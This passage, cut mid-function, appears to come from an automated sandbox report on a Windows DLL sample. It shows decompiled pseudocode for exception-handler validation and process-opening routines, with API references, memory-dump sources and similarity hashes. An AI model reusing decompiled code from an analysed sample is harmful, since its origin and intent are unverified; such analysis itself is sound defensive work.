                                    						 *0x6e1d41a4 =  *0x6e1d41a4 | 0xffffffff;
                                    					}
                                    					return 0;
                                    				}
                                    			}









                                    0x6e1d146d
                                    0x6e1d147b
                                    0x6e1d1483
                                    0x6e1d1488
                                    0x6e1d14d2
                                    0x6e1d14d2
                                    0x6e1d148a
                                    0x6e1d1492
                                    0x6e1d14ce
                                    0x6e1d14d0
                                    0x6e1d1494
                                    0x6e1d1494
                                    0x6e1d1499
                                    0x6e1d14a7
                                    0x6e1d14ac
                                    0x6e1d14b2
                                    0x6e1d14ba
                                    0x6e1d14bf
                                    0x6e1d14c1
                                    0x6e1d14c1
                                    0x6e1d14cb
                                    0x6e1d14cb

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1D17B8,74B063F0,00000000), ref: 6E1D147B
                                    • GetVersion.KERNEL32 ref: 6E1D148A
                                    • GetCurrentProcessId.KERNEL32 ref: 6E1D1499
                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1D14B2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: Process$CreateCurrentEventOpenVersion
                                    • String ID:
                                    • API String ID: 845504543-0
                                    • Opcode ID: 7311e68ffb75e489567802f5f5ac2ccbe649c9c0da85faad6802906716990c8c
                                    • Instruction ID: bd338f51c947558303e8a19a8bdda64994412a76ef1711d1dae909d0e46a1981
                                    • Opcode Fuzzy Hash: 7311e68ffb75e489567802f5f5ac2ccbe649c9c0da85faad6802906716990c8c
                                    • Instruction Fuzzy Hash: F2F03A71646A11AFEF919FA8AC0A74A3BE4BB17B11F10C11AF115DA1C0D3B06087BF54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E1D2485(long _a4) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				short* _v32;
                                    				void _v36;
                                    				void* _t57;
                                    				signed int _t58;
                                    				signed int _t61;
                                    				signed int _t62;
                                    				void* _t63;
                                    				signed int* _t68;
                                    				intOrPtr* _t69;
                                    				intOrPtr* _t71;
                                    				intOrPtr _t72;
                                    				intOrPtr _t75;
                                    				void* _t76;
                                    				signed int _t77;
                                    				void* _t78;
                                    				void _t80;
                                    				signed int _t81;
                                    				signed int _t84;
                                    				signed int _t86;
                                    				short* _t87;
                                    				void* _t89;
                                    				signed int* _t90;
                                    				long _t91;
                                    				signed int _t93;
                                    				signed int _t94;
                                    				signed int _t100;
                                    				signed int _t102;
                                    				void* _t104;
                                    				long _t108;
                                    				signed int _t110;
                                    
                                    				_t108 = _a4;
                                    				_t76 =  *(_t108 + 8);
                                    				if((_t76 & 0x00000003) != 0) {
                                    					L3:
                                    					return 0;
                                    				}
                                    				_a4 =  *[fs:0x4];
                                    				_v8 =  *[fs:0x8];
                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                    					_t102 =  *(_t108 + 0xc);
                                    					__eflags = _t102 - 0xffffffff;
                                    					if(_t102 != 0xffffffff) {
                                    						_t91 = 0;
                                    						__eflags = 0;
                                    						_a4 = 0;
                                    						_t57 = _t76;
                                    						do {
                                    							_t80 =  *_t57;
                                    							__eflags = _t80 - 0xffffffff;
                                    							if(_t80 == 0xffffffff) {
                                    								goto L9;
                                    							}
                                    							__eflags = _t80 - _t91;
                                    							if(_t80 >= _t91) {
                                    								L20:
                                    								_t63 = 0;
                                    								L60:
                                    								return _t63;
                                    							}
                                    							L9:
                                    							__eflags =  *(_t57 + 4);
                                    							if( *(_t57 + 4) != 0) {
                                    								_t12 =  &_a4;
                                    								 *_t12 = _a4 + 1;
                                    								__eflags =  *_t12;
                                    							}
                                    							_t91 = _t91 + 1;
                                    							_t57 = _t57 + 0xc;
                                    							__eflags = _t91 - _t102;
                                    						} while (_t91 <= _t102);
                                    						__eflags = _a4;
                                    						if(_a4 == 0) {
                                    							L15:
                                    							_t81 =  *0x6e1d41f8;
                                    							_t110 = _t76 & 0xfffff000;
                                    							_t58 = 0;
                                    							__eflags = _t81;
                                    							if(_t81 <= 0) {
                                    								L18:
                                    								_t104 = _t102 | 0xffffffff;
                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                    								__eflags = _t61;
                                    								if(_t61 < 0) {
                                    									_t62 = 0;
                                    									__eflags = 0;
                                    								} else {
                                    									_t62 = _a4;
                                    								}
                                    								__eflags = _t62;
                                    								if(_t62 == 0) {
                                    									L59:
                                    									_t63 = _t104;
                                    									goto L60;
                                    								} else {
                                    									__eflags = _v12 - 0x1000000;
                                    									if(_v12 != 0x1000000) {
                                    										goto L59;
                                    									}
                                    									__eflags = _v16 & 0x000000cc;
                                    									if((_v16 & 0x000000cc) == 0) {
                                    										L46:
                                    										_t63 = 1;
                                    										 *0x6e1d4240 = 1;
                                    										__eflags =  *0x6e1d4240;
                                    										if( *0x6e1d4240 != 0) {
                                    											goto L60;
                                    										}
                                    										_t84 =  *0x6e1d41f8;
                                    										__eflags = _t84;
                                    										_t93 = _t84;
                                    										if(_t84 <= 0) {
                                    											L51:
                                    											__eflags = _t93;
                                    											if(_t93 != 0) {
                                    												L58:
                                    												 *0x6e1d4240 = 0;
                                    												goto L5;
                                    											}
                                    											_t77 = 0xf;
                                    											__eflags = _t84 - _t77;
                                    											if(_t84 <= _t77) {
                                    												_t77 = _t84;
                                    											}
                                    											_t94 = 0;
                                    											__eflags = _t77;
                                    											if(_t77 < 0) {
                                    												L56:
                                    												__eflags = _t84 - 0x10;
                                    												if(_t84 < 0x10) {
                                    													_t86 = _t84 + 1;
                                    													__eflags = _t86;
                                    													 *0x6e1d41f8 = _t86;
                                    												}
                                    												goto L58;
                                    											} else {
                                    												do {
                                    													_t68 = 0x6e1d4200 + _t94 * 4;
                                    													_t94 = _t94 + 1;
                                    													__eflags = _t94 - _t77;
                                    													 *_t68 = _t110;
                                    													_t110 =  *_t68;
                                    												} while (_t94 <= _t77);
                                    												goto L56;
                                    											}
                                    										}
                                    										_t69 = 0x6e1d41fc + _t84 * 4;
                                    										while(1) {
                                    											__eflags =  *_t69 - _t110;
                                    											if( *_t69 == _t110) {
                                    												goto L51;
                                    											}
                                    											_t93 = _t93 - 1;
                                    											_t69 = _t69 - 4;
                                    											__eflags = _t93;
                                    											if(_t93 > 0) {
                                    												continue;
                                    											}
                                    											goto L51;
                                    										}
                                    										goto L51;
                                    									}
                                    									_t87 = _v32;
                                    									__eflags =  *_t87 - 0x5a4d;
                                    									if( *_t87 != 0x5a4d) {
                                    										goto L59;
                                    									}
                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                    									__eflags =  *_t71 - 0x4550;
                                    									if( *_t71 != 0x4550) {
                                    										goto L59;
                                    									}
                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                    										goto L59;
                                    									}
                                    									_t78 = _t76 - _t87;
                                    									__eflags =  *((short*)(_t71 + 6));
                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                    										goto L59;
                                    									}
                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                    									__eflags = _t78 - _t72;
                                    									if(_t78 < _t72) {
                                    										goto L46;
                                    									}
                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                    										goto L46;
                                    									}
                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                    										goto L20;
                                    									}
                                    									goto L46;
                                    								}
                                    							} else {
                                    								goto L16;
                                    							}
                                    							while(1) {
                                    								L16:
                                    								__eflags =  *((intOrPtr*)(0x6e1d4200 + _t58 * 4)) - _t110;
                                    								if( *((intOrPtr*)(0x6e1d4200 + _t58 * 4)) == _t110) {
                                    									break;
                                    								}
                                    								_t58 = _t58 + 1;
                                    								__eflags = _t58 - _t81;
                                    								if(_t58 < _t81) {
                                    									continue;
                                    								}
                                    								goto L18;
                                    							}
                                    							__eflags = _t58;
                                    							if(_t58 <= 0) {
                                    								goto L5;
                                    							}
                                    							 *0x6e1d4240 = 1;
                                    							__eflags =  *0x6e1d4240;
                                    							if( *0x6e1d4240 != 0) {
                                    								goto L5;
                                    							}
                                    							__eflags =  *((intOrPtr*)(0x6e1d4200 + _t58 * 4)) - _t110;
                                    							if( *((intOrPtr*)(0x6e1d4200 + _t58 * 4)) == _t110) {
                                    								L32:
                                    								_t100 = 0;
                                    								__eflags = _t58;
                                    								if(_t58 < 0) {
                                    									L34:
                                    									 *0x6e1d4240 = 0;
                                    									goto L5;
                                    								} else {
                                    									goto L33;
                                    								}
                                    								do {
                                    									L33:
                                    									_t90 = 0x6e1d4200 + _t100 * 4;
                                    									_t100 = _t100 + 1;
                                    									__eflags = _t100 - _t58;
                                    									 *_t90 = _t110;
                                    									_t110 =  *_t90;
                                    								} while (_t100 <= _t58);
                                    								goto L34;
                                    							}
                                    							_t58 = _t81 - 1;
                                    							__eflags = _t58;
                                    							if(_t58 < 0) {
                                    								L28:
                                    								__eflags = _t81 - 0x10;
                                    								if(_t81 < 0x10) {
                                    									_t81 = _t81 + 1;
                                    									__eflags = _t81;
                                    									 *0x6e1d41f8 = _t81;
                                    								}
                                    								_t58 = _t81 - 1;
                                    								goto L32;
                                    							} else {
                                    								goto L25;
                                    							}
                                    							while(1) {
                                    								L25:
                                    								__eflags =  *((intOrPtr*)(0x6e1d4200 + _t58 * 4)) - _t110;
                                    								if( *((intOrPtr*)(0x6e1d4200 + _t58 * 4)) == _t110) {
                                    									break;
                                    								}
                                    								_t58 = _t58 - 1;
                                    								__eflags = _t58;
                                    								if(_t58 >= 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							__eflags = _t58;
                                    							if(__eflags >= 0) {
                                    								if(__eflags == 0) {
                                    									goto L34;
                                    								}
                                    								goto L32;
                                    							}
                                    							goto L28;
                                    						}
                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                    						__eflags = _t75 - _v8;
                                    						if(_t75 < _v8) {
                                    							goto L20;
                                    						}
                                    						__eflags = _t75 - _t108;
                                    						if(_t75 >= _t108) {
                                    							goto L20;
                                    						}
                                    						goto L15;
                                    					}
                                    					L5:
                                    					_t63 = 1;
                                    					goto L60;
                                    				} else {
                                    					goto L3;
                                    				}
                                    			}




































                                    0x6e1d248f
                                    0x6e1d2492
                                    0x6e1d2498
                                    0x6e1d24b6
                                    0x00000000
                                    0x6e1d24b6
                                    0x6e1d24a0
                                    0x6e1d24a9
                                    0x6e1d24af
                                    0x6e1d24be
                                    0x6e1d24c1
                                    0x6e1d24c4
                                    0x6e1d24ce
                                    0x6e1d24ce
                                    0x6e1d24d0
                                    0x6e1d24d3
                                    0x6e1d24d5
                                    0x6e1d24d5
                                    0x6e1d24d7
                                    0x6e1d24da
                                    0x00000000
                                    0x00000000
                                    0x6e1d24dc
                                    0x6e1d24de
                                    0x6e1d2544
                                    0x6e1d2544
                                    0x6e1d26a2
                                    0x00000000
                                    0x6e1d26a2
                                    0x6e1d24e0
                                    0x6e1d24e0
                                    0x6e1d24e4
                                    0x6e1d24e6
                                    0x6e1d24e6
                                    0x6e1d24e6
                                    0x6e1d24e6
                                    0x6e1d24e9
                                    0x6e1d24ea
                                    0x6e1d24ed
                                    0x6e1d24ed
                                    0x6e1d24f1
                                    0x6e1d24f5
                                    0x6e1d2503
                                    0x6e1d2503
                                    0x6e1d250b
                                    0x6e1d2511
                                    0x6e1d2513
                                    0x6e1d2515
                                    0x6e1d2525
                                    0x6e1d2532
                                    0x6e1d2536
                                    0x6e1d253b
                                    0x6e1d253d
                                    0x6e1d25bb
                                    0x6e1d25bb
                                    0x6e1d253f
                                    0x6e1d253f
                                    0x6e1d253f
                                    0x6e1d25bd
                                    0x6e1d25bf
                                    0x6e1d26a0
                                    0x6e1d26a0
                                    0x00000000
                                    0x6e1d25c5
                                    0x6e1d25c5
                                    0x6e1d25cc
                                    0x00000000
                                    0x00000000
                                    0x6e1d25d2
                                    0x6e1d25d6
                                    0x6e1d2632
                                    0x6e1d2634
                                    0x6e1d263c
                                    0x6e1d263e
                                    0x6e1d2640
                                    0x00000000
                                    0x00000000
                                    0x6e1d2642
                                    0x6e1d2648
                                    0x6e1d264a
                                    0x6e1d264c
                                    0x6e1d2661
                                    0x6e1d2661
                                    0x6e1d2663
                                    0x6e1d2692
                                    0x6e1d2699
                                    0x00000000
                                    0x6e1d2699
                                    0x6e1d2667
                                    0x6e1d2668
                                    0x6e1d266a
                                    0x6e1d266c
                                    0x6e1d266c
                                    0x6e1d266e
                                    0x6e1d2670
                                    0x6e1d2672
                                    0x6e1d2686
                                    0x6e1d2686
                                    0x6e1d2689
                                    0x6e1d268b
                                    0x6e1d268b
                                    0x6e1d268c
                                    0x6e1d268c
                                    0x00000000
                                    0x6e1d2674
                                    0x6e1d2674
                                    0x6e1d2674
                                    0x6e1d267d
                                    0x6e1d267e
                                    0x6e1d2680
                                    0x6e1d2682
                                    0x6e1d2682
                                    0x00000000
                                    0x6e1d2674
                                    0x6e1d2672
                                    0x6e1d264e
                                    0x6e1d2655
                                    0x6e1d2655
                                    0x6e1d2657
                                    0x00000000
                                    0x00000000
                                    0x6e1d2659
                                    0x6e1d265a
                                    0x6e1d265d
                                    0x6e1d265f
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d265f
                                    0x00000000
                                    0x6e1d2655
                                    0x6e1d25d8
                                    0x6e1d25db
                                    0x6e1d25e0
                                    0x00000000
                                    0x00000000
                                    0x6e1d25e9
                                    0x6e1d25eb
                                    0x6e1d25f1
                                    0x00000000
                                    0x00000000
                                    0x6e1d25f7
                                    0x6e1d25fd
                                    0x00000000
                                    0x00000000
                                    0x6e1d2603
                                    0x6e1d2605
                                    0x6e1d260e
                                    0x6e1d2612
                                    0x00000000
                                    0x00000000
                                    0x6e1d2618
                                    0x6e1d261b
                                    0x6e1d261d
                                    0x00000000
                                    0x00000000
                                    0x6e1d2624
                                    0x6e1d2626
                                    0x00000000
                                    0x00000000
                                    0x6e1d2628
                                    0x6e1d262c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d262c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d2517
                                    0x6e1d2517
                                    0x6e1d2517
                                    0x6e1d251e
                                    0x00000000
                                    0x00000000
                                    0x6e1d2520
                                    0x6e1d2521
                                    0x6e1d2523
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d2523
                                    0x6e1d254b
                                    0x6e1d254d
                                    0x00000000
                                    0x00000000
                                    0x6e1d255d
                                    0x6e1d255f
                                    0x6e1d2561
                                    0x00000000
                                    0x00000000
                                    0x6e1d2567
                                    0x6e1d256e
                                    0x6e1d259a
                                    0x6e1d259a
                                    0x6e1d259c
                                    0x6e1d259e
                                    0x6e1d25b2
                                    0x6e1d25b4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d25a0
                                    0x6e1d25a0
                                    0x6e1d25a0
                                    0x6e1d25a9
                                    0x6e1d25aa
                                    0x6e1d25ac
                                    0x6e1d25ae
                                    0x6e1d25ae
                                    0x00000000
                                    0x6e1d25a0
                                    0x6e1d2570
                                    0x6e1d2573
                                    0x6e1d2575
                                    0x6e1d2587
                                    0x6e1d2587
                                    0x6e1d258a
                                    0x6e1d258c
                                    0x6e1d258c
                                    0x6e1d258d
                                    0x6e1d258d
                                    0x6e1d2593
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d2577
                                    0x6e1d2577
                                    0x6e1d2577
                                    0x6e1d257e
                                    0x00000000
                                    0x00000000
                                    0x6e1d2580
                                    0x6e1d2580
                                    0x6e1d2581
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d2581
                                    0x6e1d2583
                                    0x6e1d2585
                                    0x6e1d2598
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d2598
                                    0x00000000
                                    0x6e1d2585
                                    0x6e1d24f7
                                    0x6e1d24fa
                                    0x6e1d24fd
                                    0x00000000
                                    0x00000000
                                    0x6e1d24ff
                                    0x6e1d2501
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e1d2501
                                    0x6e1d24c6
                                    0x6e1d24c8
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E1D2536
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID: MemoryQueryVirtual
                                    • String ID:
                                    • API String ID: 2850889275-0
                                    • Opcode ID: aa99e4b849e40578172c739b494eb0489fda866afa4f32d237a6d8ffe3341a13
                                    • Instruction ID: 8eebce399180419afa63b01023dec7884a3af9609a7e02209453f5a4abe5d0dc
                                    • Opcode Fuzzy Hash: aa99e4b849e40578172c739b494eb0489fda866afa4f32d237a6d8ffe3341a13
                                    • Instruction Fuzzy Hash: 3A61F3717546028FDB55CFA9D8A0B9A73B5ABA6314F348468DC35C7284E730D8CAEA50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E6E1D2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				void* __ebp;
                                    				signed int* _t43;
                                    				char _t44;
                                    				void* _t46;
                                    				void* _t49;
                                    				intOrPtr* _t53;
                                    				void* _t54;
                                    				void* _t65;
                                    				long _t66;
                                    				signed int* _t80;
                                    				signed int* _t82;
                                    				void* _t84;
                                    				signed int _t86;
                                    				void* _t89;
                                    				void* _t95;
                                    				void* _t96;
                                    				void* _t99;
                                    				void* _t106;
                                    
                                    				_t43 = _t84;
                                    				_t65 = __ebx + 2;
                                    				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                    				_t89 = _t95;
                                    				_t96 = _t95 - 8;
                                    				_push(_t65);
                                    				_push(_t84);
                                    				_push(_t89);
                                    				asm("cld");
                                    				_t66 = _a8;
                                    				_t44 = _a4;
                                    				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                    					_push(_t89);
                                    					E6E1D23CB(_t66 + 0x10, _t66, 0xffffffff);
                                    					_t46 = 1;
                                    				} else {
                                    					_v12 = _t44;
                                    					_v8 = _a12;
                                    					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                    					_t86 =  *(_t66 + 0xc);
                                    					_t80 =  *(_t66 + 8);
                                    					_t49 = E6E1D2485(_t66);
                                    					_t99 = _t96 + 4;
                                    					if(_t49 == 0) {
                                    						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                    						goto L11;
                                    					} else {
                                    						while(_t86 != 0xffffffff) {
                                    							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                    							if(_t53 == 0) {
                                    								L8:
                                    								_t80 =  *(_t66 + 8);
                                    								_t86 = _t80[_t86 + _t86 * 2];
                                    								continue;
                                    							} else {
                                    								_t54 =  *_t53();
                                    								_t89 = _t89;
                                    								_t86 = _t86;
                                    								_t66 = _a8;
                                    								_t55 = _t54;
                                    								_t106 = _t54;
                                    								if(_t106 == 0) {
                                    									goto L8;
                                    								} else {
                                    									if(_t106 < 0) {
                                    										_t46 = 0;
                                    									} else {
                                    										_t82 =  *(_t66 + 8);
                                    										E6E1D2370(_t55, _t66);
                                    										_t89 = _t66 + 0x10;
                                    										E6E1D23CB(_t89, _t66, 0);
                                    										_t99 = _t99 + 0xc;
                                    										E6E1D2467(_t82[2]);
                                    										 *(_t66 + 0xc) =  *_t82;
                                    										_t66 = 0;
                                    										_t86 = 0;
                                    										 *(_t82[2])(1);
                                    										goto L8;
                                    									}
                                    								}
                                    							}
                                    							goto L13;
                                    						}
                                    						L11:
                                    						_t46 = 1;
                                    					}
                                    				}
                                    				L13:
                                    				return _t46;
                                    			}























                                    0x6e1d2268
                                    0x6e1d2269
                                    0x6e1d226a
                                    0x6e1d226d
                                    0x6e1d226f
                                    0x6e1d2272
                                    0x6e1d2273
                                    0x6e1d2275
                                    0x6e1d2276
                                    0x6e1d2277
                                    0x6e1d227a
                                    0x6e1d2284
                                    0x6e1d2335
                                    0x6e1d233c
                                    0x6e1d2345
                                    0x6e1d228a
                                    0x6e1d228a
                                    0x6e1d2290
                                    0x6e1d2296
                                    0x6e1d2299
                                    0x6e1d229c
                                    0x6e1d22a0
                                    0x6e1d22a5
                                    0x6e1d22aa
                                    0x6e1d232a
                                    0x00000000
                                    0x6e1d22ac
                                    0x6e1d22ac
                                    0x6e1d22b8
                                    0x6e1d22ba
                                    0x6e1d2315
                                    0x6e1d2315
                                    0x6e1d231b
                                    0x00000000
                                    0x6e1d22bc
                                    0x6e1d22cb
                                    0x6e1d22cd
                                    0x6e1d22ce
                                    0x6e1d22cf
                                    0x6e1d22d2
                                    0x6e1d22d2
                                    0x6e1d22d4
                                    0x00000000
                                    0x6e1d22d6
                                    0x6e1d22d6
                                    0x6e1d2320
                                    0x6e1d22d8
                                    0x6e1d22d8
                                    0x6e1d22dc
                                    0x6e1d22e4
                                    0x6e1d22e9
                                    0x6e1d22ee
                                    0x6e1d22fa
                                    0x6e1d2302
                                    0x6e1d2309
                                    0x6e1d230f
                                    0x6e1d2313
                                    0x00000000
                                    0x6e1d2313
                                    0x6e1d22d6
                                    0x6e1d22d4
                                    0x00000000
                                    0x6e1d22ba
                                    0x6e1d232e
                                    0x6e1d232e
                                    0x6e1d232e
                                    0x6e1d22aa
                                    0x6e1d234a
                                    0x6e1d2351

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464612332.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
                                    • Associated: 00000000.00000002.464576143.000000006E1D0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464631051.000000006E1D3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464657545.000000006E1D5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000000.00000002.464675910.000000006E1D6000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                    • Instruction ID: 571eef8333246a14a0b2317577906ee57248c19caaa776f452e06fc9b00dd45a
                                    • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                    • Instruction Fuzzy Hash: 9521C832900205EFCB11DFA8C8C09ABB7A9FF4D350B468568DD299B245D730F959D7E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction ID: e08d5a4dc9e8d684b3c6c30f62f29e5228fa42cafd654afcd33df1ea5beaaf5b
                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                    • Instruction Fuzzy Hash: 3B112E7724105B43D3C085ADC5F47A7A397EBE522BB29C376D1628B6D8D123A1579500
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.465163344.000000006E2A1000.00000040.00020000.sdmp, Offset: 6E2A1000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                    • Instruction ID: 9c5330fef85eeaea77d619f9c757c4344ffd7653ef604145ce54e7c1401deba3
                                    • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                    • Instruction Fuzzy Hash: E51193B73401059FD754DF99DC90E92B3DBEB99730B29816AEE04CB306E635E845C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.465163344.000000006E2A1000.00000040.00020000.sdmp, Offset: 6E2A1000, based on PE: false
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                    • Instruction ID: a931b21665a0295eea8db21389e1ce484cf1381fc733bc91c6994a0f506714b1
                                    • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
                                    • Instruction Fuzzy Hash: A001F9B23542478FD718CF5DD994D6AB7E5FBC6331B15807FC686C7616D120E889C510
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Maklocchroperator!=$Stolx
                                    • String ID:
                                    • API String ID: 3353032694-0
                                    • Opcode ID: ccb1e968dc82828f30ffd14cbd7407f544e300a6dd40d22551d87fe0a69a5f88
                                    • Instruction ID: 44f9a27839a2548d6008e41e0e58c199ae80c655c043a9b0316ce00c710a9da6
                                    • Opcode Fuzzy Hash: ccb1e968dc82828f30ffd14cbd7407f544e300a6dd40d22551d87fe0a69a5f88
                                    • Instruction Fuzzy Hash: 70718575D00559ABDB04CFE9E890AEEB7B5AF98304F24C019FC65AB781D7309981DBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___initconout.LIBCMTD ref: 6E231E54
                                      • Part of subcall function 6E23A360: CreateFileA.KERNEL32(6E26FDFC,40000000,00000003,00000000,00000003,00000000,00000000,?,6E231E59), ref: 6E23A379
                                    • GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6E231ED9
                                    • WideCharToMultiByte.KERNEL32(00000000), ref: 6E231EE0
                                    • WriteConsoleA.KERNEL32(6E29CB50,00000000,?,?,00000000), ref: 6E231F07
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
                                    • String ID:
                                    • API String ID: 3432720595-0
                                    • Opcode ID: de351a5dd7711895de9ce1ad4439da0929a78e9276ce4175991f5590bf6111be
                                    • Instruction ID: 2dc1c71a2292708d8994d89f0a9e6c4579e2e5581bd38848d7703f31ab87b196
                                    • Opcode Fuzzy Hash: de351a5dd7711895de9ce1ad4439da0929a78e9276ce4175991f5590bf6111be
                                    • Instruction Fuzzy Hash: 4621B1B8518619EFDF10CFE5C85ABAA337ABB06B11F604329E1058A1C4D77055C9DFB1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Mpunct$_memmove_s
                                    • String ID: @
                                    • API String ID: 1173002688-2766056989
                                    • Opcode ID: a0b5220b89f55b11557bb22e618a5aed2394f1c43c716bda71601f23200ae3ab
                                    • Instruction ID: c5da17add395d3183457adf6c27f171ecf6239b4410b16d0afaec03e21d011f6
                                    • Opcode Fuzzy Hash: a0b5220b89f55b11557bb22e618a5aed2394f1c43c716bda71601f23200ae3ab
                                    • Instruction Fuzzy Hash: 45C13AB1904549DFCB04CF98C990AEEBBFABF88304F248659F919A7351D734A981DF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.464720519.000000006E1DF000.00000020.00020000.sdmp, Offset: 6E1DF000, based on PE: false
                                    Similarity
                                    • API ID: Mpunct$_memmove_s
                                    • String ID: @
                                    • API String ID: 1173002688-2766056989
                                    • Opcode ID: 468e85a2134b476da882d11d8a89329d480821abf810bce16ccca35a35f79929
                                    • Instruction ID: 58909087214a5992b4ed1de5ccf2bd790da5b246125c58b92446def811aed67f
                                    • Opcode Fuzzy Hash: 468e85a2134b476da882d11d8a89329d480821abf810bce16ccca35a35f79929
                                    • Instruction Fuzzy Hash: 62C13CB19045499FCB04CF98C990AEEBBF9BF88304F24865DF915AB351D734A941DF90
                                    Uniqueness

